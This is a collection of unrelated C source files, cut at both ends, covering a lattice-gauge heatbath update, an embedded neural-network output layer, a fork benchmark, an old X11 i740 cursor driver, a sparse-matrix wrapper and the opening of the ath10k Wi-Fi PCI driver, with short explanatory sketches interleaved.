xr3=cos((double)pi2*xr3); /* if(this_node == 0)printf("rand= %e %e %e %e\n",xr1,xr2,xr3,xr4); */ /* generate a0 component of su3 matrix first consider generating an su(2) matrix h according to exp(bg/3 * re tr(h*s)) rewrite re tr(h*s) as re tr(h*v)z where v is an su(2) matrix and z is a real normalization constant let v = z*v. 
(z is 2*xi in k-p notation) v is represented in the form v(0) + i*sig*v (sig are pauli) v(0) and vector v are real let a = h*v and now generate a rewrite beta/3 * re tr(h*v) * z as al*a0 a0 has prob(a0) = n0 * sqrt(1 - a0**2) * exp(al * a0) */ al=b3*z; /*if(this_node == 0)printf("al= %e\n",al);*/ /* let a0 = 1 - del**2 get d = del**2 such that prob2(del) = n1 * del**2 * exp(-al*del**2) */ d= -(xr2 + xr1*xr3*xr3)/al; /* monte carlo prob1(del) = n2 * sqrt(1 - 0.5*del**2) then prob(a0) = n3 * prob1(a0)*prob2(a0) */ /* now beat each site into submission */ nacd = 0; if ((1.00 - 0.5*d) > xr4*xr4) nacd=1; if(nacd == 0 && al > 2.0) /* k-p algorithm */ { test=0; for(k=0;k<20 && test == 0;k++) { kp++; /* get four random numbers (add a small increment to prevent taking log(0.)*/ xr1=myrand(&(st->site_prn)); xr1 = (log((double)(xr1+ 1.e-10))); xr2=myrand(&(st->site_prn)); xr2 = (log((double)(xr2+ 1.e-10))); xr3=myrand(&(st->site_prn)); xr4=myrand(&(st->site_prn)); xr3=cos((double)pi2*xr3); d = -(xr2 + xr1*xr3*xr3)/al; if((1.00 - 0.5*d) > xr4*xr4) test = 1; } if(this_node == 0 && test !=1) printf("site took 20 kp hits\n"); } /* endif nacd */ if(nacd == 0 && al <= 2.0) /* creutz algorithm */ { cr++; xl=exp((double)(-2.0*al)); xd= 1.0 - xl; test=0; for(k=0;k<20 && test == 0 ;k++) { /* get two random numbers */ xr1=myrand(&(st->site_prn)); xr2=myrand(&(st->site_prn)); r = xl + xd*xr1; a0 = 1.00 + log((double)r)/al; if((1.0 -a0*a0) > xr2*xr2) test = 1; } d = 1.0 - a0; if(this_node == 0 && test !=1) printf("site took 20 creutz hits\n"); } /* endif nacd */ /* generate full su(2) matrix and update link matrix*/ /* find a0 = 1 - d*/ a0 = 1.0 - d; /* compute r */ r2 = 1.0 - a0*a0; r2 = fabs((double)r2); r = sqrt((double)r2); /* compute a3 */ a3=(2.0*myrand(&(st->site_prn)) - 1.0)*r; /* compute a1 and a2 */ rho = r2 - a3*a3; rho = fabs((double)rho); rho= sqrt((double)rho); /*xr2 is a random number between 0 and 2*pi */ xr2=pi2*myrand(&(st->site_prn)); a1= rho*cos((double)xr2); a2= rho*sin((double)xr2); /* now do the updating. h = a*v^dagger, new u = h*u */ h0 = a0*v0 + a1*v1 + a2*v2 + a3*v3; h1 = a1*v0 - a0*v1 + a2*v3 - a3*v2; h2 = a2*v0 - a0*v2 + a3*v1 - a1*v3; h3 = a3*v0 - a0*v3 + a1*v2 - a2*v1; /* Elements of SU(2) matrix */ h.e[0][0] = cmplx( h0, h3); h.e[0][1] = cmplx( h2, h1); h.e[1][0] = cmplx(-h2, h1); h.e[1][1] = cmplx( h0,-h3); /* update the link */ left_su2_hit_n(&h,ina,inb,&(st->link[dir])); } /* st */ /* diagnostics {Real avekp, avecr; avekp=(Real)kp / (Real)(nx*ny*nz*nt/2); avecr=(Real)cr / (Real)(nx*ny*nz*nt/2); if(this_node ==0) printf(" ave kp steps = %e, ave creutz steps = %e\n", (double)avekp,(double)avecr); } */ } /* hits */ } /* direction */ }} /* parity and NumTrj */ } /* monte */
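/* A self-contained sketch of the Creutz accept/reject step used above for
 * small coupling (al <= 2.0): draw a0 on [-1, 1] from the exponential
 * weight exp(al*a0) by inverting its CDF, then accept with probability
 * sqrt(1 - a0*a0), giving prob(a0) ~ sqrt(1 - a0^2) * exp(al*a0) as the
 * comments above describe. drand48() (POSIX) stands in for the site-local
 * myrand() generator, and unlike the production code this sketch does not
 * cap the retry loop at 20 hits. */
#include <stdio.h>
#include <stdlib.h>
#include <math.h>

static double creutz_a0(double al)
{
    double xl = exp(-2.0 * al), xd = 1.0 - xl, a0;
    for (;;) {
        double r1 = drand48(), r2 = drand48();
        a0 = 1.0 + log(xl + xd * r1) / al;   /* a0 distributed as exp(al*a0) */
        if ((1.0 - a0 * a0) > r2 * r2)       /* correct by sqrt(1 - a0^2) */
            return a0;
    }
}

int main(void)
{
    double sum = 0.0;
    int n = 100000;
    srand48(1234);
    for (int i = 0; i < n; i++)
        sum += creutz_a0(1.5);
    /* the mean of a0 rises toward 1 as the coupling al grows */
    printf("al = 1.5: <a0> = %f over %d draws\n", sum / n, n);
    return 0;
}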
312460.c
/* * Copyright (c) 2018-2019 * Jianjia Ma, Wearable Bio-Robotics Group (WBR) * majianjia@live.com * * SPDX-License-Identifier: Apache-2.0 * * Change Logs: * Date Author Notes * 2019-07-23 Jianjia Ma The first version */ #include <stdint.h> #include <string.h> #include <stdbool.h> #include "nnom.h" #include "nnom_local.h" #include "nnom_layers.h" #include "layers/nnom_output.h" nnom_status_t output_build(nnom_layer_t *layer); nnom_status_t output_run(nnom_layer_t *layer); nnom_layer_t *output_s(nnom_io_config_t* config) { nnom_layer_t *layer = Output(config->shape, config->data); if(layer) layer->config = config; return layer; } nnom_layer_t *Output(nnom_3d_shape_t output_shape, void *p_buf) { // they are actually the same, except for the type defined nnom_layer_t *layer = Input(output_shape, p_buf); if (layer != NULL) { layer->type = NNOM_OUTPUT; layer->run = output_run; layer->build = default_build; } return layer; } nnom_status_t output_run(nnom_layer_t *layer) { nnom_io_layer_t *cl = (nnom_io_layer_t *)layer; memcpy(cl->buf, layer->in->tensor->p_data, tensor_size(layer->out->tensor)); // in->memory -> user memory return NN_SUCCESS; }
772582.c
/* ============================================================================== fork_test.c C Code for fork() creation test ============================================================================== */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/wait.h> #define NFORKS 50000 void do_nothing() { int i; i = 0; } int main() { int pid, j, status; for (j = 0; j < NFORKS; j++) { /*** error handling ***/ if ((pid = fork()) < 0) { printf("fork failed with error code= %d\n", pid); exit(1); } /*** this is the child of the fork ***/ else if (pid == 0) { do_nothing(); exit(0); } /*** this is the parent of the fork ***/ else { waitpid(pid, &status, 0); } } exit(0); }
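/* A sketch of how a fork-creation benchmark like the one above is usually
 * timed: wrap the fork/exit/waitpid loop with CLOCK_MONOTONIC samples and
 * report the average per-fork cost. NFORKS is reduced here only to keep
 * the example quick; this is an illustrative harness, not part of the
 * original test. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <time.h>

#define NFORKS 1000

int main(void)
{
    struct timespec t0, t1;
    int status;

    clock_gettime(CLOCK_MONOTONIC, &t0);
    for (int j = 0; j < NFORKS; j++) {
        pid_t pid = fork();
        if (pid < 0) { perror("fork"); exit(1); }
        if (pid == 0) _exit(0);          /* child: exit immediately */
        waitpid(pid, &status, 0);        /* parent: reap the child */
    }
    clock_gettime(CLOCK_MONOTONIC, &t1);

    double sec = (t1.tv_sec - t0.tv_sec) + (t1.tv_nsec - t0.tv_nsec) / 1e9;
    printf("%d forks in %.3f s (%.1f us per fork+wait)\n",
           NFORKS, sec, sec * 1e6 / NFORKS);
    return 0;
}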
846566.c
/************************************************************************** Copyright 1998-1999 Precision Insight, Inc., Cedar Park, Texas. All Rights Reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sub license, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice (including the next paragraph) shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL PRECISION INSIGHT AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. **************************************************************************/ /* $XFree86: xc/programs/Xserver/hw/xfree86/drivers/i740/i740_cursor.c,v 1.4 2000/02/23 04:47:13 martin Exp $ */ /* * Authors: * Daryll Strauss <daryll@precisioninsight.com> * */ #ifdef HAVE_CONFIG_H #include "config.h" #endif #include "xf86.h" #include "xf86_OSproc.h" #include "xf86_ansic.h" #include "compiler.h" #include "xf86fbman.h" #include "vgaHW.h" #include "xf86xv.h" #include "i740.h" static void I740LoadCursorImage(ScrnInfoPtr pScrn, unsigned char *src); static void I740ShowCursor(ScrnInfoPtr pScrn); static void I740HideCursor(ScrnInfoPtr pScrn); static void I740SetCursorPosition(ScrnInfoPtr pScrn, int x, int y); static void I740SetCursorColors(ScrnInfoPtr pScrn, int bg, int fb); static Bool I740UseHWCursor(ScreenPtr pScrn, CursorPtr pCurs); Bool I740CursorInit(ScreenPtr pScreen) { ScrnInfoPtr pScrn; I740Ptr pI740; xf86CursorInfoPtr infoPtr; FBAreaPtr fbarea; pScrn = xf86Screens[pScreen->myNum]; pI740 = I740PTR(pScrn); pI740->CursorInfoRec = infoPtr = xf86CreateCursorInfoRec(); if (!infoPtr) return FALSE; infoPtr->MaxWidth = 64; infoPtr->MaxHeight = 64; infoPtr->Flags = HARDWARE_CURSOR_TRUECOLOR_AT_8BPP | HARDWARE_CURSOR_BIT_ORDER_MSBFIRST | HARDWARE_CURSOR_INVERT_MASK | HARDWARE_CURSOR_SWAP_SOURCE_AND_MASK | HARDWARE_CURSOR_AND_SOURCE_WITH_MASK | HARDWARE_CURSOR_SOURCE_MASK_INTERLEAVE_64; infoPtr->SetCursorColors = I740SetCursorColors; infoPtr->SetCursorPosition = I740SetCursorPosition; infoPtr->LoadCursorImage = I740LoadCursorImage; infoPtr->HideCursor = I740HideCursor; infoPtr->ShowCursor = I740ShowCursor; infoPtr->UseHWCursor = I740UseHWCursor; /* * Allocate a region the full width and tall enough * that at least 6K of video memory is consumed. * Then use a 1 kilobyte piece that is 4K byte aligned * within that region. KAO. 
*/ fbarea = xf86AllocateOffscreenArea(pScreen, pScrn->displayWidth, ((6*1024)/(pScrn->displayWidth*pI740->cpp))+1, 0,0,0,0); if (fbarea == NULL) { pI740->CursorStart=0; xf86DrvMsg(pScrn->scrnIndex, X_WARNING, "Hardware cursor disabled due to failure allocating offscreen memory.\n"); } else { pI740->CursorStart = ((((fbarea->box.x1 + pScrn->displayWidth * fbarea->box.y1) * pI740->cpp)+4096)&0xfff000); } /* * Perhaps move the cursor to the beginning of the frame buffer * so that it never fails? */ if (pI740->CursorStart>4*1024*1024) { pI740->CursorStart=0; xf86DrvMsg(pScrn->scrnIndex, X_WARNING, "Disabling hardware cursor due to large framebuffer\n"); } return xf86InitCursor(pScreen, infoPtr); } static Bool I740UseHWCursor(ScreenPtr pScreen, CursorPtr pCurs) { ScrnInfoPtr pScrn; I740Ptr pI740; pScrn = xf86Screens[pScreen->myNum]; pI740 = I740PTR(pScrn); if (pScrn->currentMode->Flags&V_DBLSCAN) return FALSE; if (!pI740->CursorStart) return FALSE; return TRUE; } static void I740LoadCursorImage(ScrnInfoPtr pScrn, unsigned char *src) { I740Ptr pI740; int x, y; CARD8 *pcurs; pI740 = I740PTR(pScrn); pcurs = (CARD8 *)(pI740->FbBase + pI740->CursorStart); for (y = 0; y < 64; y++) { for (x = 0; x < 64 / 4; x++) { *pcurs++ = *src++; } } } static void I740SetCursorPosition(ScrnInfoPtr pScrn, int x, int y) { I740Ptr pI740; int flag; pI740 = I740PTR(pScrn); if (x >= 0) flag = CURSOR_X_POS; else { flag = CURSOR_X_NEG; x=-x; } pI740->writeControl(pI740, XRX, CURSOR_X_LO, x&0xFF); pI740->writeControl(pI740, XRX, CURSOR_X_HI, (((x >> 8) & 0x07) | flag)); if (y >= 0) flag = CURSOR_Y_POS; else { flag = CURSOR_Y_NEG; y=-y; } pI740->writeControl(pI740, XRX, CURSOR_Y_LO, y&0xFF); pI740->writeControl(pI740, XRX, CURSOR_Y_HI, (((y >> 8) & 0x07) | flag)); } static void I740ShowCursor(ScrnInfoPtr pScrn) { I740Ptr pI740; unsigned char tmp; pI740 = I740PTR(pScrn); pI740->writeControl(pI740, XRX, CURSOR_BASEADDR_LO, (pI740->CursorStart & 0x0000F000) >> 8); pI740->writeControl(pI740, XRX, CURSOR_BASEADDR_HI, (pI740->CursorStart & 0x003F0000) >> 16); pI740->writeControl(pI740, XRX, CURSOR_CONTROL, CURSOR_ORIGIN_DISPLAY | CURSOR_MODE_64_3C); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp |= HW_CURSOR_ENABLE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); } static void I740HideCursor(ScrnInfoPtr pScrn) { unsigned char tmp; I740Ptr pI740; pI740 = I740PTR(pScrn); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp &= ~HW_CURSOR_ENABLE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); } static void I740SetCursorColors(ScrnInfoPtr pScrn, int bg, int fg) { int tmp; I740Ptr pI740; pI740 = I740PTR(pScrn); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp |= EXTENDED_PALETTE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); pI740->writeStandard(pI740, DACMASK, 0xFF); pI740->writeStandard(pI740, DACWX, 0x04); pI740->writeStandard(pI740, DACDATA, (bg & 0x00FF0000) >> 16); pI740->writeStandard(pI740, DACDATA, (bg & 0x0000FF00) >> 8); pI740->writeStandard(pI740, DACDATA, (bg & 0x000000FF)); pI740->writeStandard(pI740, DACDATA, (fg & 0x00FF0000) >> 16); pI740->writeStandard(pI740, DACDATA, (fg & 0x0000FF00) >> 8); pI740->writeStandard(pI740, DACDATA, (fg & 0x000000FF)); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp &= ~EXTENDED_PALETTE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); }
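/* A worked sketch of the alignment arithmetic in I740CursorInit() above:
 * the byte offset of the allocated offscreen area is pushed up to a
 * 4 KiB boundary by adding 4096 and masking with 0xfff000 (which clears
 * the low 12 bits). The numbers below are made up purely to show the
 * computation; only the formula comes from the code above. */
#include <stdio.h>

int main(void)
{
    int x1 = 0, y1 = 600;          /* hypothetical offscreen area origin */
    int display_width = 1024;      /* pixels per scanline */
    int cpp = 2;                   /* bytes per pixel (16 bpp) */

    unsigned long byte_off = (unsigned long)(x1 + display_width * y1) * cpp;
    unsigned long cursor_start = (byte_off + 4096) & 0xfff000;

    printf("area starts at byte %lu, cursor at %lu (4K aligned: %s)\n",
           byte_off, cursor_start,
           (cursor_start % 4096) == 0 ? "yes" : "no");
    return 0;
}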
861220.c
#include "alphasparse/kernel_plain.h" #include "alphasparse/util.h" alphasparse_status_t ONAME(const ALPHA_Number alpha, const ALPHA_SPMAT_DIA *A, const ALPHA_Number *x, const ALPHA_INT columns, const ALPHA_INT ldx, ALPHA_Number *y, const ALPHA_INT ldy) { ALPHA_SPMAT_DIA *transposed_mat; transpose_dia(A, &transposed_mat); alphasparse_status_t status = trsm_dia_u_lo_col_plain(alpha, transposed_mat, x, columns, ldx, y, ldy); destroy_dia(transposed_mat); return status; }
83628.c
// SPDX-License-Identifier: ISC /* * Copyright (c) 2005-2011 Atheros Communications Inc. * Copyright (c) 2011-2017 Qualcomm Atheros, Inc. */ #include <linux/pci.h> #include <linux/module.h> #include <linux/interrupt.h> #include <linux/spinlock.h> #include <linux/bitops.h> #include "core.h" #include "debug.h" #include "coredump.h" #include "targaddrs.h" #include "bmi.h" #include "hif.h" #include "htc.h" #include "ce.h" #include "pci.h" enum ath10k_pci_reset_mode { ATH10K_PCI_RESET_AUTO = 0, ATH10K_PCI_RESET_WARM_ONLY = 1, }; static unsigned int ath10k_pci_irq_mode = ATH10K_PCI_IRQ_AUTO; static unsigned int ath10k_pci_reset_mode = ATH10K_PCI_RESET_AUTO; module_param_named(irq_mode, ath10k_pci_irq_mode, uint, 0644); MODULE_PARM_DESC(irq_mode, "0: auto, 1: legacy, 2: msi (default: 0)"); module_param_named(reset_mode, ath10k_pci_reset_mode, uint, 0644); MODULE_PARM_DESC(reset_mode, "0: auto, 1: warm only (default: 0)"); /* how long to wait for target to initialise, in ms */ #define ATH10K_PCI_TARGET_WAIT 3000 #define ATH10K_PCI_NUM_WARM_RESET_ATTEMPTS 3 /* Maximum number of bytes that can be handled atomically by * diag read and write. */ #define ATH10K_DIAG_TRANSFER_LIMIT 0x5000 #define QCA99X0_PCIE_BAR0_START_REG 0x81030 #define QCA99X0_CPU_MEM_ADDR_REG 0x4d00c #define QCA99X0_CPU_MEM_DATA_REG 0x4d010 static const struct pci_device_id ath10k_pci_id_table[] = { /* PCI-E QCA988X V2 (Ubiquiti branded) */ { PCI_VDEVICE(UBIQUITI, QCA988X_2_0_DEVICE_ID_UBNT) }, { PCI_VDEVICE(ATHEROS, QCA988X_2_0_DEVICE_ID) }, /* PCI-E QCA988X V2 */ { PCI_VDEVICE(ATHEROS, QCA6164_2_1_DEVICE_ID) }, /* PCI-E QCA6164 V2.1 */ { PCI_VDEVICE(ATHEROS, QCA6174_2_1_DEVICE_ID) }, /* PCI-E QCA6174 V2.1 */ { PCI_VDEVICE(ATHEROS, QCA99X0_2_0_DEVICE_ID) }, /* PCI-E QCA99X0 V2 */ { PCI_VDEVICE(ATHEROS, QCA9888_2_0_DEVICE_ID) }, /* PCI-E QCA9888 V2 */ { PCI_VDEVICE(ATHEROS, QCA9984_1_0_DEVICE_ID) }, /* PCI-E QCA9984 V1 */ { PCI_VDEVICE(ATHEROS, QCA9377_1_0_DEVICE_ID) }, /* PCI-E QCA9377 V1 */ { PCI_VDEVICE(ATHEROS, QCA9887_1_0_DEVICE_ID) }, /* PCI-E QCA9887 */ {0} }; static const struct ath10k_pci_supp_chip ath10k_pci_supp_chips[] = { /* QCA988X pre 2.0 chips are not supported because they need some nasty * hacks. ath10k doesn't have them and these devices crash horribly * because of that. 
*/ { QCA988X_2_0_DEVICE_ID_UBNT, QCA988X_HW_2_0_CHIP_ID_REV }, { QCA988X_2_0_DEVICE_ID, QCA988X_HW_2_0_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_2_1_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_2_2_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_3_0_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_3_1_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_3_2_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_2_1_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_2_2_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_3_0_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_3_1_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_3_2_CHIP_ID_REV }, { QCA99X0_2_0_DEVICE_ID, QCA99X0_HW_2_0_CHIP_ID_REV }, { QCA9984_1_0_DEVICE_ID, QCA9984_HW_1_0_CHIP_ID_REV }, { QCA9888_2_0_DEVICE_ID, QCA9888_HW_2_0_CHIP_ID_REV }, { QCA9377_1_0_DEVICE_ID, QCA9377_HW_1_0_CHIP_ID_REV }, { QCA9377_1_0_DEVICE_ID, QCA9377_HW_1_1_CHIP_ID_REV }, { QCA9887_1_0_DEVICE_ID, QCA9887_HW_1_0_CHIP_ID_REV }, }; static void ath10k_pci_buffer_cleanup(struct ath10k *ar); static int ath10k_pci_cold_reset(struct ath10k *ar); static int ath10k_pci_safe_chip_reset(struct ath10k *ar); static int ath10k_pci_init_irq(struct ath10k *ar); static int ath10k_pci_deinit_irq(struct ath10k *ar); static int ath10k_pci_request_irq(struct ath10k *ar); static void ath10k_pci_free_irq(struct ath10k *ar); static int ath10k_pci_bmi_wait(struct ath10k *ar, struct ath10k_ce_pipe *tx_pipe, struct ath10k_ce_pipe *rx_pipe, struct bmi_xfer *xfer); static int ath10k_pci_qca99x0_chip_reset(struct ath10k *ar); static void ath10k_pci_htc_tx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htc_rx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htt_tx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htt_rx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htt_htc_rx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_pktlog_rx_cb(struct ath10k_ce_pipe *ce_state); static struct ce_attr host_ce_config_wlan[] = { /* CE0: host->target HTC control and raw streams */ { .flags = CE_ATTR_FLAGS, .src_nentries = 16, .src_sz_max = 256, .dest_nentries = 0, .send_cb = ath10k_pci_htc_tx_cb, }, /* CE1: target->host HTT + HTC control */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 2048, .dest_nentries = 512, .recv_cb = ath10k_pci_htt_htc_rx_cb, }, /* CE2: target->host WMI */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 2048, .dest_nentries = 128, .recv_cb = ath10k_pci_htc_rx_cb, }, /* CE3: host->target WMI */ { .flags = CE_ATTR_FLAGS, .src_nentries = 32, .src_sz_max = 2048, .dest_nentries = 0, .send_cb = ath10k_pci_htc_tx_cb, }, /* CE4: host->target HTT */ { .flags = CE_ATTR_FLAGS | CE_ATTR_DIS_INTR, .src_nentries = CE_HTT_H2T_MSG_SRC_NENTRIES, .src_sz_max = 256, .dest_nentries = 0, .send_cb = ath10k_pci_htt_tx_cb, }, /* CE5: target->host HTT (HIF->HTT) */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 512, .dest_nentries = 512, .recv_cb = ath10k_pci_htt_rx_cb, }, /* CE6: target autonomous hif_memcpy */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, /* CE7: ce_diag, the Diagnostic Window */ { .flags = CE_ATTR_FLAGS | CE_ATTR_POLL, .src_nentries = 2, .src_sz_max = DIAG_TRANSFER_LIMIT, .dest_nentries = 2, }, /* CE8: target->host pktlog */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 2048, .dest_nentries = 128, .recv_cb = ath10k_pci_pktlog_rx_cb, }, /* CE9 target autonomous qcache memcpy */ { .flags = CE_ATTR_FLAGS, 
.src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, /* CE10: target autonomous hif memcpy */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, /* CE11: target autonomous hif memcpy */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, }; /* Target firmware's Copy Engine configuration. */ static struct ce_pipe_config target_ce_config_wlan[] = { /* CE0: host->target HTC control and raw streams */ { .pipenum = __cpu_to_le32(0), .pipedir = __cpu_to_le32(PIPEDIR_OUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(256), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE1: target->host HTT + HTC control */ { .pipenum = __cpu_to_le32(1), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE2: target->host WMI */ { .pipenum = __cpu_to_le32(2), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(64), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE3: host->target WMI */ { .pipenum = __cpu_to_le32(3), .pipedir = __cpu_to_le32(PIPEDIR_OUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE4: host->target HTT */ { .pipenum = __cpu_to_le32(4), .pipedir = __cpu_to_le32(PIPEDIR_OUT), .nentries = __cpu_to_le32(256), .nbytes_max = __cpu_to_le32(256), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* NB: 50% of src nentries, since tx has 2 frags */ /* CE5: target->host HTT (HIF->HTT) */ { .pipenum = __cpu_to_le32(5), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(512), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE6: Reserved for target autonomous hif_memcpy */ { .pipenum = __cpu_to_le32(6), .pipedir = __cpu_to_le32(PIPEDIR_INOUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(4096), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE7 used only by Host */ { .pipenum = __cpu_to_le32(7), .pipedir = __cpu_to_le32(PIPEDIR_INOUT), .nentries = __cpu_to_le32(0), .nbytes_max = __cpu_to_le32(0), .flags = __cpu_to_le32(0), .reserved = __cpu_to_le32(0), }, /* CE8 target->host pktlog */ { .pipenum = __cpu_to_le32(8), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(64), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS | CE_ATTR_DIS_INTR), .reserved = __cpu_to_le32(0), }, /* CE9 target autonomous qcache memcpy */ { .pipenum = __cpu_to_le32(9), .pipedir = __cpu_to_le32(PIPEDIR_INOUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS | CE_ATTR_DIS_INTR), .reserved = __cpu_to_le32(0), }, /* It is not necessary to send target wlan configuration for CE10 & CE11 * as these CEs are not actively used in target. */ }; /* * Map from service/endpoint to Copy Engine. * This table is derived from the CE_PCI TABLE, above. * It is passed to the Target at startup for use by firmware. 
*/ static struct service_to_pipe target_service_to_ce_map_wlan[] = { { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VO), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VO), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BK), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BK), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BE), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BE), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VI), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VI), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_CONTROL), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_CONTROL), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_RSVD_CTRL), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(0), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_RSVD_CTRL), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(1), }, { /* not used */ __cpu_to_le32(ATH10K_HTC_SVC_ID_TEST_RAW_STREAMS), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(0), }, { /* not used */ __cpu_to_le32(ATH10K_HTC_SVC_ID_TEST_RAW_STREAMS), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(1), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_HTT_DATA_MSG), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(4), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_HTT_DATA_MSG), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(5), }, /* (Additions here) */ { /* must be last */ __cpu_to_le32(0), __cpu_to_le32(0), __cpu_to_le32(0), }, }; static bool ath10k_pci_is_awake(struct ath10k *ar) { struct ath10k_pci *ar_pci = 